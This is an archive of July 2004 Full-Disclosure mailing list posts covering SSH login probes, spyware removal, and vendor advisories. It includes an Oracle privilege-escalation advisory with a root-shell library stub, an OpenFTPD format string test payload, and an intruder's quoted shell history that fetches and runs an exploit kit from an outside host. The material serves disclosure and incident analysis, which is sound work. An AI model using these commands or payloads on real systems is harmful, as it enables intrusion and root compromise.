 e495846523f861eefe787ae47dd79943 10.0/RPMS/OpenOffice.org-libs-1.1.2-3.1.100mdk.i586.rpm
 97ad227fa4a2b76e8cca7c73127c5b7a 10.0/SRPMS/OpenOffice.org-1.1.2-3.1.100mdk.src.rpm

 Mandrakelinux 10.0/AMD64:
 bdd8d8a8b6af463df910a7cde025b734 amd64/10.0/RPMS/OpenOffice.org-1.1.2-3.1.100mdk.i586.rpm
 51c8887de72b7ac39c85062b35d260e6 amd64/10.0/RPMS/OpenOffice.org-help-cs-1.1.2-3.1.100mdk.i586.rpm
 1be3655a3870f3a62608df7e864afe9e amd64/10.0/RPMS/OpenOffice.org-help-de-1.1.2-3.1.100mdk.i586.rpm
 0e01d4df1bd94eb1937b4875af700056 amd64/10.0/RPMS/OpenOffice.org-help-en-1.1.2-3.1.100mdk.i586.rpm
 5f00be2536c9e8b3a836275b96ab753b amd64/10.0/RPMS/OpenOffice.org-help-es-1.1.2-3.1.100mdk.i586.rpm
 e90125b24f99f099704d60018e339b8d amd64/10.0/RPMS/OpenOffice.org-help-eu-1.1.2-3.1.100mdk.i586.rpm
 836aec6915d5ceecc20c3e034e19e336 amd64/10.0/RPMS/OpenOffice.org-help-fi-1.1.2-3.1.100mdk.i586.rpm
 20b5190e2b683783aab65d883468074e amd64/10.0/RPMS/OpenOffice.org-help-fr-1.1.2-3.1.100mdk.i586.rpm
 4f7ef1c9b8251e96ce140463eaf28310 amd64/10.0/RPMS/OpenOffice.org-help-it-1.1.2-3.1.100mdk.i586.rpm
 7b5f6d5701e9f290d34ab7a4ada25fc1 amd64/10.0/RPMS/OpenOffice.org-help-ja-1.1.2-3.1.100mdk.i586.rpm
 d70298c769ce7dd2596d640a0c644cc9 amd64/10.0/RPMS/OpenOffice.org-help-ko-1.1.2-3.1.100mdk.i586.rpm
 ed06265ba967349b8a28420e5ff56ae8 amd64/10.0/RPMS/OpenOffice.org-help-nl-1.1.2-3.1.100mdk.i586.rpm
 b6c34d066a2addb975837dba16ffe9c7 amd64/10.0/RPMS/OpenOffice.org-help-ru-1.1.2-3.1.100mdk.i586.rpm
 c2dfd07ac968d38a0c6c59828f984850 amd64/10.0/RPMS/OpenOffice.org-help-sk-1.1.2-3.1.100mdk.i586.rpm
 6dbf67fa908bb9a90dfcc0aa7fe43c93 amd64/10.0/RPMS/OpenOffice.org-help-sv-1.1.2-3.1.100mdk.i586.rpm
 82de991deefe0ed144890b5e107c7c49 amd64/10.0/RPMS/OpenOffice.org-help-zh_CN-1.1.2-3.1.100mdk.i586.rpm
 bd471a407725562c67f7d6b993fe968c amd64/10.0/RPMS/OpenOffice.org-help-zh_TW-1.1.2-3.1.100mdk.i586.rpm
 30cbafc38454793497dcace816814589 amd64/10.0/RPMS/OpenOffice.org-l10n-ar-1.1.2-3.1.100mdk.i586.rpm
 6c1f99a64b23c335d64effc58ace1a66 amd64/10.0/RPMS/OpenOffice.org-l10n-ca-1.1.2-3.1.100mdk.i586.rpm
 f7217fbce4f4fec19c66007bf7f1c8fa amd64/10.0/RPMS/OpenOffice.org-l10n-cs-1.1.2-3.1.100mdk.i586.rpm
 da66f567a0c95d2551385706b6322511 amd64/10.0/RPMS/OpenOffice.org-l10n-da-1.1.2-3.1.100mdk.i586.rpm
 b25c4a8a5a04dba649dbe07cb74e437c amd64/10.0/RPMS/OpenOffice.org-l10n-de-1.1.2-3.1.100mdk.i586.rpm
 c9de8265acf394e867f9d37dab8b8e4f amd64/10.0/RPMS/OpenOffice.org-l10n-el-1.1.2-3.1.100mdk.i586.rpm
 26d3aec1657864a5af79e6cf42ec575c amd64/10.0/RPMS/OpenOffice.org-l10n-en-1.1.2-3.1.100mdk.i586.rpm
 306840e68f1c5554b56fcb5a78d05662 amd64/10.0/RPMS/OpenOffice.org-l10n-es-1.1.2-3.1.100mdk.i586.rpm
 d497f588850259bb25ca2a8bfb46437b amd64/10.0/RPMS/OpenOffice.org-l10n-et-1.1.2-3.1.100mdk.i586.rpm
 d093a78f33eb0e8e9ff6e10ae6f83b4f amd64/10.0/RPMS/OpenOffice.org-l10n-eu-1.1.2-3.1.100mdk.i586.rpm
 092efa049db70abadaa2eb2780d29d13 amd64/10.0/RPMS/OpenOffice.org-l10n-fi-1.1.2-3.1.100mdk.i586.rpm
 e57acc32c3fe720cd5643bb9e1bee835 amd64/10.0/RPMS/OpenOffice.org-l10n-fr-1.1.2-3.1.100mdk.i586.rpm
 061f19572d6f588b2da57b32954f4960 amd64/10.0/RPMS/OpenOffice.org-l10n-it-1.1.2-3.1.100mdk.i586.rpm
 7db9ae970b0cd452cb052743172a9985 amd64/10.0/RPMS/OpenOffice.org-l10n-ja-1.1.2-3.1.100mdk.i586.rpm
 2c39709ba4dbbbdf592d3331c4f9b236 amd64/10.0/RPMS/OpenOffice.org-l10n-ko-1.1.2-3.1.100mdk.i586.rpm
 cecb56a830fa676b1e9e27ece5c39271 amd64/10.0/RPMS/OpenOffice.org-l10n-nl-1.1.2-3.1.100mdk.i586.rpm
 ead058a94cc6f3e86d58aac7235f6782 amd64/10.0/RPMS/OpenOffice.org-l10n-pl-1.1.2-3.1.100mdk.i586.rpm
 e290451530d4bf28cca0977cb0388d18 amd64/10.0/RPMS/OpenOffice.org-l10n-pt-1.1.2-3.1.100mdk.i586.rpm
 c2d58b04563e54556780f387953edc6e amd64/10.0/RPMS/OpenOffice.org-l10n-pt_BR-1.1.2-3.1.100mdk.i586.rpm
 1dc89fbb3e79f4f3a41da6665ae9e19b amd64/10.0/RPMS/OpenOffice.org-l10n-ru-1.1.2-3.1.100mdk.i586.rpm
 308e28b58b5ee72f84d8fc3c24f4c2dd amd64/10.0/RPMS/OpenOffice.org-l10n-sk-1.1.2-3.1.100mdk.i586.rpm
 fe1419e7a3b301d28046e6d64d30f724 amd64/10.0/RPMS/OpenOffice.org-l10n-sv-1.1.2-3.1.100mdk.i586.rpm
 144a6daad887f537fbe1954d8f3de6b2 amd64/10.0/RPMS/OpenOffice.org-l10n-tr-1.1.2-3.1.100mdk.i586.rpm
 ba8e3f3119d89fa4f727f3e8d002cdec amd64/10.0/RPMS/OpenOffice.org-l10n-zh_CN-1.1.2-3.1.100mdk.i586.rpm
 f43ae55a73eff7fadce5d5fc5ec6523b amd64/10.0/RPMS/OpenOffice.org-l10n-zh_TW-1.1.2-3.1.100mdk.i586.rpm
 e495846523f861eefe787ae47dd79943 amd64/10.0/RPMS/OpenOffice.org-libs-1.1.2-3.1.100mdk.i586.rpm
 97ad227fa4a2b76e8cca7c73127c5b7a amd64/10.0/SRPMS/OpenOffice.org-1.1.2-3.1.100mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrakeUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandrakesoft for security. You can obtain
 the GPG public key of the Mandrakelinux Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandrakelinux at:

  http://www.mandrakesoft.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_linux-mandrake.com

 Type Bits/KeyID Date User ID
 pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team
  <security linux-mandrake.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQFBCd4/mqjQ0CJFipgRApq6AJ0XrRU2e5s+pbpQ89g6MUpz5xxgOwCgppkV
BOFa4EeuYkLdIja3Dd81kPs=
=4dco
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: Automated SSH login attempts?

From: Jan Muenther (jan.muenthernruns.com)
Date: Fri Jul 30 2004 - 02:35:58 CDT

Howdy,

> Highly doubtful. It's easy enough to test though - just use the tool
> to poke another machine under your control, and use tcpdump or ethereal
> to capture all the traffic (don't forget '-s 1500' or similar for tcpdump
> to get the *whole* packet).

Sidenote - '-s 0' always adjusts capture length to the MTU, allowing for a full
capture of the entire payload.

If the binary's made available, I'll throw it into IDA and see what it does.

Cheers, J.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: Automated SSH login attempts?

From: Stefan Janecek (stefan.janecekjku.at)
Date: Fri Jul 30 2004 - 04:38:53 CDT

On Thu, 2004-07-29 at 19:52, dmargolistwing.org wrote:
> Stefan Janecek wrote:
>
> > This does not seem to be a stupid brute force attack, as there is only
> > one login attempt per user. Could it be that the tool tries to exploit
> > some vulnerability in the sshd, and just tries to look harmless by using
> > 'test' and 'guest' as usernames?
> >
> > The compromised machine was running an old debian woody installation
> > which had not been upgraded for at least one year, the sshd version
> > string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
>
> Does the Debian machine that was compromised have a ``test'' or
> ``guest'' username?

No.

>
> Also, if it wasn't patched in a year, it may still be vulnerable to
> this: http://www.cert.org/advisories/CA-2003-24.html

Thanks, I'll have a look at it.

>
> I would tend to think this isn't a 0day kinda vuln, as if it were, he'd
> be a lot more successful than he seems (unless we're all rooted and
> don't even know it). But who can tell?
>

Yes, agreed - I am also convinced it must be something old, and
shouldn't be dangerous for reasonably administered machines.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Christian Fromme (derfrommegmx.de)
Date: Thu Jul 29 2004 - 18:59:03 CDT

Ali Campbell <fdisclosurealicampbell.org.uk> wrote:

> Do I take it that these things are just trying to log in using some
> guessed password(s) ? Out of interest, do we have any idea what these
> opportunistic passwords might be ?

As far as I have heared this is an 0day "exploit" which does nothing but
trying to bruteforce some accounts like "admin" "test" and so on with
passwords like "test" "1234" and i dont know what.
Seems to be not too serious because noone actually has those account in
real life. ;)

Best wishes,
Christian

--
Christian Fromme

chris at kaner.shacknet.nu
PGP-Pubkey: http://www.informatik.fh-wiesbaden.de/~cfrom001/pgp/index.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Fwd: Re: [Full-Disclosure] Re: Automated SSH login attempts?]

From: Stefan Janecek (stefan.janecekjku.at)
Date: Fri Jul 30 2004 - 05:14:30 CDT

uuups - forgot to cc the list on this one. sorry.

-----Forwarded Message-----
From: Stefan Janecek <stefan.janecekjku.at>
To: Valdis.Kletnieksvt.edu
Subject: Re: [Full-Disclosure] Re: Automated SSH login attempts?
Date: Fri, 30 Jul 2004 11:45:51 +0200

On Thu, 2004-07-29 at 21:35, Valdis.Kletnieksvt.edu wrote:
> On Thu, 29 Jul 2004 18:38:15 +0200, Stefan Janecek <stefan.janecekjku.at> said:
> >
> > This does not seem to be a stupid brute force attack, as there is only
> > one login attempt per user. Could it be that the tool tries to exploit
> > some vulnerability in the sshd, and just tries to look harmless by using
> > 'test' and 'guest' as usernames?
>
> Highly doubtful. It's easy enough to test though - just use the tool
> to poke another machine under your control, and use tcpdump or ethereal
> to capture all the traffic (don't forget '-s 1500' or similar for tcpdump
> to get the *whole* packet). Then somebody familiar with the SSH
> protocol can go through it byte by byte and look for anything odd.
>
> I don't expect we'll find anything, unless it's some very hard to trigger hole
> on some odd architecture. Remember - with all of these probes, we're only
> seeing a very few boxes actually get 0wned. More likely, script kiddies have
> re-discovered the concept that if there's 500 million boxes online, enough of
> them are administered by clueless people that they can snarf shells using a
> default userid/password pair.....
>

This is exactly what I did. The tool tries to login as users 'test' and
'guest'. But I don't think it is about just snarfing passwords, because
those users did not exist on the compromised machine - yet they got in.

My personal feeling is (given their poor success) that they are using
some old-fart ssh vulnerability. The compromised machine had an uptime
of 254 days if I remember correctly, and was hardly used during this
time, nor has it been updated. Still I would really like to know
*exactly* what they are doing, just to make sure...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] OPEN3S - Local Privilege Elevation through Oracle products (Unix Platform)

From: Juan Manuel Pascual (jmpascualopen3s.com)
Date: Fri Jul 30 2004 - 04:28:39 CDT

*----------========== OPEN3S-2004-10-05-eng-oracle-so-libraries ==========----------
*

* Title:* Local Vulnerability in Oracle Products. RDBMS, IAs, etc
           *All Versions*. (10g not tested)
* Date:* 10-05-2004
* Platform:* Tested in Linux, Solaris & HP-UX but can be exported to others.
* Impact:* Privilege elevation from oracle products installation owner
           (usually called oracle or ias ) to root.
* Author:* Juan Manuel Pascual Escriba <mailto:jmpascualopen3s.com>
* Status:* Vendor contacted details below.

*INTRODUCTION:*

Oracle Corporation (nasdaqNM - ORCL) is a world leading database software developer,
claiming to develop an unbreakable software. It's products are targeted in database,
application server and data mining market.

*PROBLEM SUMMARY:*

This software version
        - Oracle 8i Linux Platform
        - Oracle 9i Linux Platform
        - Oracle 8i HP-UX Platform
        - Oracle 9i Solaris Platform
        - Oracle IAS 9.0.2.0.1 with patchset v9.0.2.3
        - All versions tested in Unix platform (Universal?¿)

are suitable to privilege elevation from oracle software owner ( normally oracle,ias,
iasr2) to root.

*DESCRIPTION*

Oracle Libraries are installed owned by oracle in a default installation of the products
commented above.

[paskdimoniet home]$ ls -alc /export/home/iasr2/ora9ias_mid
...
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 lbs
drwxr-xr-x 15 iasr2 dba 512 Jan 7 12:13 ldap
drwxr-xr-x 3 iasr2 dba 12800 Nov 21 11:22 lib
drwxr-xr-x 13 iasr2 dba 512 Nov 21 14:04 network
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 ocommon
...

As you can see, the lib directory owner is iasr2, let's look for some setuid binaries

[paskdimoniet ora9ias_mid]$ find ./ -perm +4000
./bin/dbsnmp
./bin/nmo

[iasr2dimoniet ora9ias_mid]$ ls -alc ./bin/dbsnmp
-rwsr-s--- 1 root dba 2900980 Nov 21 14:04 ./bin/dbsnmp
[iasr2dimoniet ora9ias_mid]$ ls -alc ./bin/nmo
-rwsr-s--- 1 root dba 12632 Nov 21 14:04 ./bin/nmo

And now, just could see the shared objects that the binaries depends.

[iasr2dimoniet ora9ias_mid]$ ldd ./bin/dbsnmp
        libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
        libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
        libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
        libthread.so.1 => /usr/lib/libthread.so.1
        libkstat.so.1 => /usr/lib/libkstat.so.1
        ....

[iasr2dimoniet ora9ias_mid]$ ldd ./bin/nmo
        libnsl.so.1 => /usr/lib/libnsl.so.1
        libsocket.so.1 => /usr/lib/libsocket.so.1
        libgen.so.1 => /usr/lib/libgen.so.1
        .....

ups, it's not posible to achieve root privileges with this binary and by this way

For iasr2 user is too easy to create a so.lib, something like

#include
#include

_init() {
   printf("en el _init()\n");
   printf("Con PID=%i y EUID=%i",getpid(),getuid());
   setuid(0);
   system("/usr/bin/ksh");
   printf("Saliendo del Init()\n");
}

        
*IMPACT*
        
        oracle,ias,iasr2 or iasdb users with local access can gain root privileges through
        oracle installation

*EXPLOIT*

        commented above.

*WORKAROUND*

        chown to root lib directory and parent directory.

*STATUS*

        Oracle Security Alerts explains in an email sent 26/07/2004 that "Oracle believes that
        only trusted users should have access to the local iasdb user account".

        I have no information about a patch or a solution from Oracle Corp.

--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba jmpascualopen3s.com
Barcelona - Denia - Spain http://www.open3s.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [VSA0402] OpenFTPD format string vulnerability

From: VOID.AT Security (crewvoid.at)
Date: Fri Jul 30 2004 - 05:55:07 CDT

[VSA0402 - openftpd - void.at security notice]

Overview
========

We have discovered a format string vulnerability in openftpd
(http://www.openftpd.org:9673/openftpd). OpenFTPD is a free,
open source FTP server implementation for the UNIX platform.
FTP4ALL is not vulnerable (it doesnt use that message system).

Affected Versions
=================

This affects openftpd version up to 0.30.2. This includes
also the old version 0.29.4.

Impact
======

Middle.
Remote Shell Access when you have an working FTP user account.

Workaround:
===========

Apply the following patch or upgrade to the latest CVS version.

cat > openftpd_formatstring.patch << _EOF_
--- openftpd-daily.orig/src/misc/msg.c 2004-07-05 22:02:43.000000000 +0200
+++ openftpd-daily/src/misc/msg.c 2004-07-13 18:05:01.000000000 +0200
-319,7 +319,7
    while (fgets(buff, 67, file)) {
       if (*(buff+strlen(buff)-1) == '\n') *(buff+strlen(buff)-1) = 0;
       sprintf(str, " !C| !0%-66s !C|!0\n", buff);
- printf(str);
+ printf("%s", str);
    }
    fclose(file);
    printf("!C \\__________________________________________________!Hend of message!C__/!0\n");
_EOF_

Details
=======

When a user sends a message to another user an external program will be
called (msg). It is used for the OpenFTPD message handling.

andihoagie:~$ ncftp
...
...
ncftp / > site msg purge
All the messages in trash box purged.
ncftp / > site msg send andi "AAAA%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x|%08x]"
Message sent to andi.
ncftp / > site msg read

.________________________________________________________________________.
  | Message sent from: andi Tue 13/07/2004 18:28:46 |
  | |
  | AAAA0804c1e5|5e8457e0|2b379fc0|00000000|5e84572c|5e84568c|fbad8001|43212020|3021207c|41414141] |
   \__________________________________________________end of message__/
Messages moved to archive box.
...
...

Lets have a look at the source code:

[openftpd-daily/src/misc/msg.c, function cat_message()]
...
   while (fgets(buff, 67, file)) {
      if (*(buff+strlen(buff)-1) == '\n') *(buff+strlen(buff)-1) = 0;
      sprintf(str, " !C| !0%-66s !C|!0\n", buff);
      printf(str);
   }
...

Timeline
========

2004-04-02: Bug discovered
2004-07-14: Vendor notified (primemovr)
2004-07-16: Patch for format string bug
2004-07-22: public release

Discovered by
=============

Thomas Wana <greuffvoid.at>

Further research by
===================

Andi <andivoid.at>

Credits
=======

void.at

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBCikJp97BNrByI3oRAjtqAJ93iT5HtJvxcDOBjcZ/1RvGtof2SQCeIV7+
Thl6yy0Z84ow+hiKOHIcC6A=
=fjmj
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

From: Andrew Clover (and-bugtraqdoxdesk.com)
Date: Fri Jul 30 2004 - 06:44:11 CDT

Gregh <chowsozemail.com.au> wrote:

> It was used by me to list various entries in registry which, when lumped
> together like that, show off CWS quite easily. Once they are there, removing
> them and the progs started by some of them is easy.

This is not the case for all variants of CWS. The newer, sneakier
variants can rebuild themselves if they detect a program like HijackThis
removing their registry entries.

This is part of a strong trend in unsolicited commercial software,
copying survival techniques learned from virus authors. The use of
constantly-loaded multiple DLLs and/or processes and/or services that
all restart and repair each other if tampering is detected, is becoming
widespread (see also CommonName, ClearSearch, TVMedia etc.).

Where there are not short-cut workarounds this means removing the
software manually is simply impossible. Currently a trip into Safe Mode
can do the trick, by stopping any of the software running, but I'm sure
that'll be worked around too eventually. (Rootkit-like spyware?)

--
Andrew Clover
mailto:anddoxdesk.com
http://www.doxdesk.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Jan Muenther (jan.muenthernruns.com)
Date: Fri Jul 30 2004 - 06:51:56 CDT

Now, if anybody could jump through the hoop and send me the thing or make it
publicly available... all these things are musings, 'it looks as if...' and 'it
seems like...' are not exactly results of an analysis.

Just tracing tcpdump's output is definitely insufficient.
If the tool just sends normal TCP packets, then why does it need root rights,
which you typically only require for raw sockets to build packets which can't
be constructed with SOCK_STREAM or SOCK_DGRAM?

I hope you don't run it on your production boxes in the normal userland - ever
considered the fact it might contain an ELF infector or something?
Now, if I wanted to deploy malware on a Linux box, I'd just come up with a
mysterious looking tool and let that infect the machines of people who just
run anything they can get a hold of. It's Linux, after all, right? No viruses,
right?

> >Do I take it that these things are just trying to log in using some
> >guessed password(s) ? Out of interest, do we have any idea what these
> >opportunistic passwords might be ?
>
> At least two of them are guest:guest and test:test. I'd guess that
> root:root and adminadmin are on the list too :-)

This things needs to be disassembled, debugged and traced. All else is just
whistling in the dark. Meh.

Cheers, J.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Fwd: Re: [Full-Disclosure] Re: Automated SSH login attempts?]

From: Kenneth Ng (kenneth.d.nggmail.com)
Date: Fri Jul 30 2004 - 07:25:17 CDT

I get at least a couple of probes every day. Almost all are refused
because I have a very restrictive /etc/hosts.allow list.

On Fri, 30 Jul 2004 12:14:30 +0200, Stefan Janecek
<stefan.janecekjku.at> wrote:
> uuups - forgot to cc the list on this one. sorry.
> -----Forwarded Message-----
> From: Stefan Janecek <stefan.janecekjku.at>
> To: Valdis.Kletnieksvt.edu
> Subject: Re: [Full-Disclosure] Re: Automated SSH login attempts?
> Date: Fri, 30 Jul 2004 11:45:51 +0200
> On Thu, 2004-07-29 at 21:35, Valdis.Kletnieksvt.edu wrote:
> > On Thu, 29 Jul 2004 18:38:15 +0200, Stefan Janecek <stefan.janecekjku.at> said:
> > >
> > > This does not seem to be a stupid brute force attack, as there is only
> > > one login attempt per user. Could it be that the tool tries to exploit
> > > some vulnerability in the sshd, and just tries to look harmless by using
> > > 'test' and 'guest' as usernames?
> >
> > Highly doubtful. It's easy enough to test though - just use the tool
> > to poke another machine under your control, and use tcpdump or ethereal
> > to capture all the traffic (don't forget '-s 1500' or similar for tcpdump
> > to get the *whole* packet). Then somebody familiar with the SSH
> > protocol can go through it byte by byte and look for anything odd.
> >
> > I don't expect we'll find anything, unless it's some very hard to trigger hole
> > on some odd architecture. Remember - with all of these probes, we're only
> > seeing a very few boxes actually get 0wned. More likely, script kiddies have
> > re-discovered the concept that if there's 500 million boxes online, enough of
> > them are administered by clueless people that they can snarf shells using a
> > default userid/password pair.....
> >
>
>
> This is exactly what I did. The tool tries to login as users 'test' and
> 'guest'. But I don't think it is about just snarfing passwords, because
> those users did not exist on the compromised machine - yet they got in.
>
> My personal feeling is (given their poor success) that they are using
> some old-fart ssh vulnerability. The compromised machine had an uptime
> of 254 days if I remember correctly, and was hardly used during this
> time, nor has it been updated. Still I would really like to know
> *exactly* what they are doing, just to make sure...
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] CHX-I

From: Clement Dupuis (cdupuiscccure.org)
Date: Fri Jul 30 2004 - 07:23:30 CDT

Being from Montreal where CHX-I is developed, I had the chance to use it for
a while on a few servers and workstations, so far I have been impressed by
the product. I do know that it is being used by some government
organization in the states as well as quite a few universities. There are
some large commercial companies in Canada that are using it and some others
who are evaluating it.

The product is just amazing in its functionality and simplicity. It's like
getting lots of the niceties only found in Linux on your Windows platform
all of a sudden.

The company behind the product has been in existence for a while; they
definitively need to market their product more aggressively as it is
relatively unknown to most.

Clement

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com [mailto:full-disclosure-
> adminlists.netsys.com] On Behalf Of Maurizio Trinco
> Sent: Thursday, July 29, 2004 10:47 PM
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] CHX-I
>
> Hey all,
> CHX (http://www.idrci.net/idrci_tryit2.htm) seems to
> be a very nice piece of software. Anyone tried it in
> real life? After toying with it for a couple of hours,
> I really don't understand how come it's still just a
> (relatively) obscure application. Any comments re. its
> usage? any known vulnerabilities?
>
>
>
>
> __________________________________
> Do you Yahoo!?
> New and Improved Yahoo! Mail - 100MB free storage!
> http://promotions.yahoo.com/new_mail
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Automated SSH login attempts?

From: Todd Towles (toddtowlesbrookshires.com)
Date: Fri Jul 30 2004 - 07:53:18 CDT

Jan is right - looking at the code might be the only way to know what is
really happening.

We all await your disassembled, debugged and traced code analysis, Jan. =)

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Jan Muenther
Sent: Friday, July 30, 2004 6:52 AM
To: Andrew Farmer
Cc: Ali Campbell; full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] Automated SSH login attempts?

Now, if anybody could jump through the hoop and send me the thing or make it
publicly available... all these things are musings, 'it looks as if...' and
'it
seems like...' are not exactly results of an analysis.

Just tracing tcpdump's output is definitely insufficient.
If the tool just sends normal TCP packets, then why does it need root
rights,
which you typically only require for raw sockets to build packets which
can't
be constructed with SOCK_STREAM or SOCK_DGRAM?

I hope you don't run it on your production boxes in the normal userland -
ever
considered the fact it might contain an ELF infector or something?
Now, if I wanted to deploy malware on a Linux box, I'd just come up with a
mysterious looking tool and let that infect the machines of people who just
run anything they can get a hold of. It's Linux, after all, right? No
viruses,
right?

> >Do I take it that these things are just trying to log in using some
> >guessed password(s) ? Out of interest, do we have any idea what these
> >opportunistic passwords might be ?
>
> At least two of them are guest:guest and test:test. I'd guess that
> root:root and adminadmin are on the list too :-)

This things needs to be disassembled, debugged and traced. All else is just
whistling in the dark. Meh.

Cheers, J.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

From: Dave Horsfall (davehorsfall.org)
Date: Fri Jul 30 2004 - 08:26:59 CDT

On Fri, 30 Jul 2004, Andrew Clover wrote:

> This is not the case for all variants of CWS. The newer, sneakier
> variants can rebuild themselves if they detect a program like HijackThis
> removing their registry entries.

Not really "new", in the scheme of things. Over 30 years ago, some bored
prgrammer wrote something for one of the mainframes of the day (ICL?
IBM? Burroughs?) called "Robin Hood and Friar Tuck".

They were two programs that monitored each other, occasionally printing
cheeky messages to the console. Eventually, the (night-shift) operator
would notice, and delete one of them. The console dialogue then went
something like this:

FRIAR: HELP ME SIR ROBIN, I AM UNDER ATTACK!
ROBIN: FEAR NOT, BRAVE FRIAR, I SHALL RESCUE YOU!

And so one restarted the other.

The only way to remove this harmless jape (if you didn't know the right
command) was to IPL the box, and it was a brave operator who did that...

-- Dave

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: Automated SSH login attempts?

andrewgfelinemenace.org
Date: Fri Jul 30 2004 - 08:36:02 CDT

Greetings list,

Accidentially sent only to Stefan, so redoing it.

On Thu, Jul 29, 2004 at 06:38:15PM +0200, Stefan Janecek wrote:
> Hmmm - I have also been getting those login attemps, but thought them to
> be harmless. Maybe they are not *that* harmless, though... Today I
> managed to get my hands on a machine that was originating such login
> attempts. I must admit I am far from being a linux security expert, but
> this is what I've found out up to now:
>

I got a similar experience from a game box I look after
(void.labs.pulltheplug.com, but people may prefer
http://vortex.labs.pulltheplug.com, feel free to jump on the irc server
irc.pulltheplug.com, #social or #vortex).

The .bash_history is as follows:

passwd
uname -a
cat /etc/issue
w
/sbin.ifconfig
/sbin/ifconfig
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
ftp ftp.sh3ll.info
lynx
lynx www.sh3ll.info/milenium/xpl.tgz
ls
ls -alF
tar zxv xpl.tgz
tar zxvf xpl.tgz
cd supe`
cd super
./prt
lynx mil3nium.go.ro/milenium
lynx mil3nium.go.ro/
ncftp
ncftpget
lynx sh3ll.info/milenium/milenium
ls
ls -alF
ps -aux |grep test
lynx sh3ll.info/milenium/psy1985.tgz
mkdir .drivers
mv psy1985.tgz .drivers
cd .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
cd nsmail/
PATH='.:$PATH'
inetd -e -o

It would appear that if they can't get a local root, they'll use the box for
IRCing from.

Hopefully this helps someone. I haven't looked too much into this, if wanted
I could grab the source ip addresses used for logging into guest, but thats
probably not overly useful.

Thanks,
Andrew Griffiths

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Stateful Packet Inspection

From: Aaron Gray (angraybeeb.net)
Date: Fri Jul 30 2004 - 07:44:39 CDT

I am interested in finding information on SPI, either algorithms, and/or open source code,

Hope you can help,

TCS

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Cool Web Search

From: Gregh (chowsozemail.com.au)
Date: Fri Jul 30 2004 - 08:36:49 CDT

----- Original Message -----
From: "Andrew Clover" <and-bugtraqdoxdesk.com>
To: <full-disclosurelists.netsys.com>
Sent: Friday, July 30, 2004 9:44 PM
Subject: Re: [Full-Disclosure] Cool Web Search

> Gregh <chowsozemail.com.au> wrote:
>
> > It was used by me to list various entries in registry which, when lumped
> > together like that, show off CWS quite easily. Once they are there,
removing
> > them and the progs started by some of them is easy.
>
> This is not the case for all variants of CWS. The newer, sneakier
> variants can rebuild themselves if they detect a program like HijackThis
> removing their registry entries.

Sorry but totally and utterly incorrect. You just do NOT understand what I
have typed. I said that I used HiJackThis to list the entries in a group
then ticked them manually and then removed them. Along with that, it allowed
you to identify the exe files that went with it.

If you dont understand that then I can understand that you dont know how to
get rid of it but the truth is that this way DOES get rid of it. There are
